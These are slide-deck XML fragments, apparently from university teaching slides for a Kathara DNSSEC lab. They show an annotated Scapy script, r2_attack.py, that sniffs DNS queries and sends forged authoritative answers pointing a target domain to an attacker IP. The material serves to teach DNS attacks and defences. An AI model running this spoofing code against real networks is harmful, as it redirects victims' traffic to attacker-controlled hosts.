                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</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dns_spoof</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pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and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 DNS_UNI_IP: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[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</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t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </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ether_layer</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ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</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udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=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[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport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dport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[UDP].sport)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dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</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[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5210C092-F080-94DC-6432-D998C02A7609}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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578862CF-9DD5-6665-BB2A-5976BDE31185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3D59B31-FB41-1A52-72D8-38AFB4F3C9EF}"/>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78870D2B-6E50-C7D6-9195-BE8D9FA32854}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C4339A-142D-7A4C-D817-DA271CA7AEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7209952" y="2735079"/>
            <a:ext cx="4837463" cy="940105"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4234"/>
              <a:gd name="adj2" fmla="val 207111"/>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Creates the UDP header. Reverses ports: if the query arrived on port 53, the response will start from 53.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607B9506-FF83-1D8C-E3CB-CF32775F7402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6917286" y="5838145"/>
            <a:ext cx="3738990" cy="465025"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97355"/>
              <a:gd name="adj2" fmla="val -3293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it-IT" dirty="0"/>
              <a:t>Copia l'ID della query originale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829822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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2C9207-C19E-A6C3-ACEF-536A5819D67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>copyright notice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{497B66A6-D1AF-2196-495D-D786D522847C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>All the pages/slides in this presentation, including but not limited to, images, photos, animations, videos, sounds, music, and text (hereby referred to as “material”) are protected by copyright.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>This material, with the exception of some multimedia elements licensed by other organizations, is property of the authors and/or organizations appearing in the first slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>This material, or its parts, can be reproduced and used for didactical purposes within universities and schools, provided that this happens for non-profit purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>Information contained in this material cannot be used within network design projects or other products of any kind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>Any other use is prohibited, unless explicitly authorized by the authors on the basis of an explicit agreement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>The authors assume no responsibility about this material and provide this material “as is”, with no implicit or explicit warranty about the correctness and completeness of its contents, which may be subject to changes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="0" dirty="0"/>
              <a:t>This copyright notice must always be redistributed together with the material, or its portions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EB0DE9-B9FF-F794-0C57-CD532E92170F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317BB90C-4606-D484-6FB1-00FD5806DE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3120295" y="6453191"/>
            <a:ext cx="6144843" cy="333375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>kathara – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="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32B60-0462-255D-8C3E-6CF4877D93EF}"/>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A458A177-C02C-401B-4556-DDA2C8A45CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A08A8C-F48E-38E3-AFB2-56D3906D812B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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en-US"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qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                aa=1,</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ra</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</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an=DNSRR(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rrname</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='A', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rclass</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='IN', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=600, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=EVIL_IP)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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spoofed_pkt</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ether_layer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ip_layer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udp_layer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dns_layer</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sendp</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spoofed_pkt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iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, verbose=False)            </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</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sniff(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, filter=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>f"udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> port 53 and </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host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> {DNS_UNI_IP}",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prn</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dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, store=0)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>except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KeyboardInterrupt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print</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>("\n[*] Attack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stopped</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> by user.")</a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA1ACB8-5DBD-0442-77D7-DCB88B7D71E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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A5B8C8D0-7DAD-C7F3-C40E-9E6CA5A05C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533524" y="116632"/>
            <a:ext cx="10048875" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1180C5C4-3829-5FAF-74F1-0805541B2A55}"/>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6FCEBFF9-9EA4-B1ED-605B-7DD69E076EAB}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7E03FD7-795A-EC79-6FE6-2B44034347F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5945374" y="1429205"/>
            <a:ext cx="3271550" cy="447256"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -114100"/>
              <a:gd name="adj2" fmla="val 9293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set the package as response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69731B26-2F30-C896-27A9-4CD025715F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6343161" y="2027795"/>
            <a:ext cx="3271550" cy="447256"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -124264"/>
              <a:gd name="adj2" fmla="val 23905"/>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it-IT">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>authoritative answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F9B265-991C-56D1-86FD-4BD48F62EDDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="66594" y="1909973"/>
            <a:ext cx="2510695" cy="702598"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70177"/>
              <a:gd name="adj2" fmla="val 10619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it-IT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
